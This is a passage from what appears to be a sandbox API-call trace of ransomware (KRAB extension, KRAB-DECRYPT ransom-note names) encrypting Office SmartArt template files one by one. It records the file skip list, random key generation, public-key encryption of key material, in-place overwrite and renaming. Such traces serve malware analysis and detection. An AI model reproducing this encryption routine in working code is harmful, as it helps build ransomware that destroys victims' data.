lpString2="TM03328884[[fn=architecture]].glox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328884[[fn=architecture]].glox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328884[[fn=architecture]].glox" [0072.665] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0072.665] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328884[[fn=architecture]].glox.KRAB") returned 143 [0072.665] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328884[[fn=architecture]].glox") returned 138 [0072.665] lstrlenW (lpString=".glox") returned 5 [0072.665] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0072.666] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".glox ") returned 6 [0072.666] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.666] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328884[[fn=architecture]].glox") returned 138 [0072.666] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328884[[fn=architecture]].glox") returned 138 [0072.666] lstrcmpiW (lpString1="TM03328884[[fn=architecture]].glox", lpString2="desktop.ini") returned 1 [0072.666] lstrcmpiW (lpString1="TM03328884[[fn=architecture]].glox", lpString2="autorun.inf") returned 1 [0072.666] lstrcmpiW (lpString1="TM03328884[[fn=architecture]].glox", lpString2="ntuser.dat") returned 1 [0072.666] lstrcmpiW (lpString1="TM03328884[[fn=architecture]].glox", lpString2="iconcache.db") returned 1 [0072.666] lstrcmpiW (lpString1="TM03328884[[fn=architecture]].glox", lpString2="bootsect.bak") returned 1 [0072.666] lstrcmpiW (lpString1="TM03328884[[fn=architecture]].glox", lpString2="boot.ini") returned 1 [0072.666] lstrcmpiW (lpString1="TM03328884[[fn=architecture]].glox", lpString2="ntuser.dat.log") returned 1 [0072.666] lstrcmpiW (lpString1="TM03328884[[fn=architecture]].glox", lpString2="thumbs.db") returned 1 [0072.666] lstrcmpiW (lpString1="TM03328884[[fn=architecture]].glox", lpString2="KRAB-DECRYPT.html") returned 1 [0072.666] lstrcmpiW (lpString1="TM03328884[[fn=architecture]].glox", lpString2="KRAB-DECRYPT.txt") returned 1 [0072.666] lstrcmpiW (lpString1="TM03328884[[fn=architecture]].glox", lpString2="CRAB-DECRYPT.txt") returned 1 [0072.666] lstrcmpiW (lpString1="TM03328884[[fn=architecture]].glox", lpString2="ntldr") returned 1 [0072.666] lstrcmpiW (lpString1="TM03328884[[fn=architecture]].glox", lpString2="NTDETECT.COM") returned 1 [0072.666] lstrcmpiW (lpString1="TM03328884[[fn=architecture]].glox", lpString2="Bootfont.bin") returned 1 [0072.666] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0072.667] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1011ab8) returned 1 [0072.667] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0072.668] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0072.668] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0072.668] CryptGenRandom (in: hProv=0x1011ab8, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0072.668] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0072.668] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.668] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1012558) returned 1 [0072.669] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0072.669] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0072.670] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0072.670] CryptGenRandom (in: hProv=0x1012558, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0072.670] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0072.670] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.670] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1012558) returned 1 [0072.671] CryptImportKey (in: hProv=0x1012558, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023a38) returned 1 [0072.671] CryptGetKeyParam (in: hKey=0x1023a38, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0072.671] CryptEncrypt (in: hKey=0x1023a38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0072.671] GetLastError () returned 0x0 [0072.671] CryptDestroyKey (hKey=0x1023a38) returned 1 [0072.671] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0072.671] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1011ab8) returned 1 [0072.671] CryptImportKey (in: hProv=0x1011ab8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x10239f8) returned 1 [0072.672] CryptGetKeyParam (in: hKey=0x10239f8, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0072.672] CryptEncrypt (in: hKey=0x10239f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0072.672] GetLastError () returned 0x0 [0072.672] CryptDestroyKey (hKey=0x10239f8) returned 1 [0072.672] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0072.672] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328884[[fn=architecture]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328884[[fn=architecture]].glox"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0072.677] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0072.678] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0072.678] ReadFile (in: hFile=0x484, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ddfc*=0x1697, lpOverlapped=0x0) returned 1 [0072.692] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xffffe969, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.692] WriteFile (in: hFile=0x484, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x1697, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ddf8*=0x1697, lpOverlapped=0x0) returned 1 [0072.692] WriteFile (in: hFile=0x484, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0072.692] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.696] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.697] CloseHandle (hObject=0x484) returned 1 [0072.706] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.706] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328884[[fn=architecture]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328884[[fn=architecture]].glox"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328884[[fn=architecture]].glox.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328884[[fn=architecture]].glox.krab")) returned 1 [0072.707] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.707] FindNextFileW (in: hFindFile=0x1023bf8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0072.708] lstrcmpW (lpString1="TM03328893[[fn=BracketList]].glox", lpString2=".") returned 1 [0072.708] lstrcmpW (lpString1="TM03328893[[fn=BracketList]].glox", lpString2="..") returned 1 [0072.708] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="TM03328893[[fn=BracketList]].glox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328893[[fn=BracketList]].glox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328893[[fn=BracketList]].glox" [0072.708] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0072.708] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328893[[fn=BracketList]].glox.KRAB") returned 142 [0072.708] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328893[[fn=BracketList]].glox") returned 137 [0072.708] lstrlenW (lpString=".glox") returned 5 [0072.708] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0072.708] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".glox ") returned 6 [0072.709] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.709] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328893[[fn=BracketList]].glox") returned 137 [0072.709] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328893[[fn=BracketList]].glox") returned 137 [0072.709] lstrcmpiW (lpString1="TM03328893[[fn=BracketList]].glox", lpString2="desktop.ini") returned 1 [0072.709] lstrcmpiW (lpString1="TM03328893[[fn=BracketList]].glox", lpString2="autorun.inf") returned 1 [0072.709] lstrcmpiW (lpString1="TM03328893[[fn=BracketList]].glox", lpString2="ntuser.dat") returned 1 [0072.709] lstrcmpiW (lpString1="TM03328893[[fn=BracketList]].glox", lpString2="iconcache.db") returned 1 [0072.709] lstrcmpiW (lpString1="TM03328893[[fn=BracketList]].glox", lpString2="bootsect.bak") returned 1 [0072.709] lstrcmpiW (lpString1="TM03328893[[fn=BracketList]].glox", lpString2="boot.ini") returned 1 [0072.709] lstrcmpiW (lpString1="TM03328893[[fn=BracketList]].glox", lpString2="ntuser.dat.log") returned 1 [0072.709] lstrcmpiW (lpString1="TM03328893[[fn=BracketList]].glox", lpString2="thumbs.db") returned 1 [0072.709] lstrcmpiW (lpString1="TM03328893[[fn=BracketList]].glox", lpString2="KRAB-DECRYPT.html") returned 1 [0072.709] lstrcmpiW (lpString1="TM03328893[[fn=BracketList]].glox", lpString2="KRAB-DECRYPT.txt") returned 1 [0072.709] lstrcmpiW (lpString1="TM03328893[[fn=BracketList]].glox", lpString2="CRAB-DECRYPT.txt") returned 1 [0072.709] lstrcmpiW (lpString1="TM03328893[[fn=BracketList]].glox", lpString2="ntldr") returned 1 [0072.709] lstrcmpiW (lpString1="TM03328893[[fn=BracketList]].glox", lpString2="NTDETECT.COM") returned 1 [0072.709] lstrcmpiW (lpString1="TM03328893[[fn=BracketList]].glox", lpString2="Bootfont.bin") returned 1 [0072.710] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0072.710] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1012558) returned 1 [0072.710] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0072.711] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0072.711] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0072.711] CryptGenRandom (in: hProv=0x1012558, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0072.711] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0072.711] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.711] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1012558) returned 1 [0072.712] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0072.713] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0072.713] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0072.713] CryptGenRandom (in: hProv=0x1012558, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0072.713] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0072.713] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.713] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1012558) returned 1 [0072.730] CryptImportKey (in: hProv=0x1012558, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023b38) returned 1 [0072.730] CryptGetKeyParam (in: hKey=0x1023b38, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0072.730] CryptEncrypt (in: hKey=0x1023b38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0072.730] GetLastError () returned 0x0 [0072.731] CryptDestroyKey (hKey=0x1023b38) returned 1 [0072.731] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0072.731] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1012558) returned 1 [0072.731] CryptImportKey (in: hProv=0x1012558, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023938) returned 1 [0072.731] CryptGetKeyParam (in: hKey=0x1023938, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0072.731] CryptEncrypt (in: hKey=0x1023938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0072.732] GetLastError () returned 0x0 [0072.732] CryptDestroyKey (hKey=0x1023938) returned 1 [0072.732] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0072.732] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328893[[fn=BracketList]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328893[[fn=bracketlist]].glox"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0072.735] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0072.736] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0072.736] ReadFile (in: hFile=0x484, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ddfc*=0xfba, lpOverlapped=0x0) returned 1 [0072.765] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xfffff046, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.765] WriteFile (in: hFile=0x484, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xfba, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ddf8*=0xfba, lpOverlapped=0x0) returned 1 [0072.765] WriteFile (in: hFile=0x484, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0072.765] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.769] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.770] CloseHandle (hObject=0x484) returned 1 [0072.771] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.771] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328893[[fn=BracketList]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328893[[fn=bracketlist]].glox"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328893[[fn=BracketList]].glox.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328893[[fn=bracketlist]].glox.krab")) returned 1 [0072.772] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.773] FindNextFileW (in: hFindFile=0x1023bf8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0072.773] lstrcmpW (lpString1="TM03328905[[fn=Chevron Accent]].glox", lpString2=".") returned 1 [0072.773] lstrcmpW (lpString1="TM03328905[[fn=Chevron Accent]].glox", lpString2="..") returned 1 [0072.773] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="TM03328905[[fn=Chevron Accent]].glox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328905[[fn=Chevron Accent]].glox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328905[[fn=Chevron Accent]].glox" [0072.773] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0072.773] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328905[[fn=Chevron Accent]].glox.KRAB") returned 145 [0072.773] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328905[[fn=Chevron Accent]].glox") returned 140 [0072.773] lstrlenW (lpString=".glox") returned 5 [0072.773] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0072.773] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".glox ") returned 6 [0072.774] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.774] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328905[[fn=Chevron Accent]].glox") returned 140 [0072.774] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328905[[fn=Chevron Accent]].glox") returned 140 [0072.774] lstrcmpiW (lpString1="TM03328905[[fn=Chevron Accent]].glox", lpString2="desktop.ini") returned 1 [0072.774] lstrcmpiW (lpString1="TM03328905[[fn=Chevron Accent]].glox", lpString2="autorun.inf") returned 1 [0072.774] lstrcmpiW (lpString1="TM03328905[[fn=Chevron Accent]].glox", lpString2="ntuser.dat") returned 1 [0072.774] lstrcmpiW (lpString1="TM03328905[[fn=Chevron Accent]].glox", lpString2="iconcache.db") returned 1 [0072.774] lstrcmpiW (lpString1="TM03328905[[fn=Chevron Accent]].glox", lpString2="bootsect.bak") returned 1 [0072.774] lstrcmpiW (lpString1="TM03328905[[fn=Chevron Accent]].glox", lpString2="boot.ini") returned 1 [0072.774] lstrcmpiW (lpString1="TM03328905[[fn=Chevron Accent]].glox", lpString2="ntuser.dat.log") returned 1 [0072.774] lstrcmpiW (lpString1="TM03328905[[fn=Chevron Accent]].glox", lpString2="thumbs.db") returned 1 [0072.774] lstrcmpiW (lpString1="TM03328905[[fn=Chevron Accent]].glox", lpString2="KRAB-DECRYPT.html") returned 1 [0072.774] lstrcmpiW (lpString1="TM03328905[[fn=Chevron Accent]].glox", lpString2="KRAB-DECRYPT.txt") returned 1 [0072.774] lstrcmpiW (lpString1="TM03328905[[fn=Chevron Accent]].glox", lpString2="CRAB-DECRYPT.txt") returned 1 [0072.774] lstrcmpiW (lpString1="TM03328905[[fn=Chevron Accent]].glox", lpString2="ntldr") returned 1 [0072.774] lstrcmpiW (lpString1="TM03328905[[fn=Chevron Accent]].glox", lpString2="NTDETECT.COM") returned 1 [0072.774] lstrcmpiW (lpString1="TM03328905[[fn=Chevron Accent]].glox", lpString2="Bootfont.bin") returned 1 [0072.774] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0072.775] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1011ab8) returned 1 [0072.775] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0072.776] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0072.776] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0072.790] CryptGenRandom (in: hProv=0x1011ab8, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0072.790] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0072.790] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.790] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1012558) returned 1 [0072.791] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0072.791] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0072.791] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0072.791] CryptGenRandom (in: hProv=0x1012558, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0072.791] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0072.792] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.792] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1012558) returned 1 [0072.792] CryptImportKey (in: hProv=0x1012558, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x10239f8) returned 1 [0072.792] CryptGetKeyParam (in: hKey=0x10239f8, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0072.792] CryptEncrypt (in: hKey=0x10239f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0072.793] GetLastError () returned 0x0 [0072.793] CryptDestroyKey (hKey=0x10239f8) returned 1 [0072.793] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0072.793] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1011ab8) returned 1 [0072.793] CryptImportKey (in: hProv=0x1011ab8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, 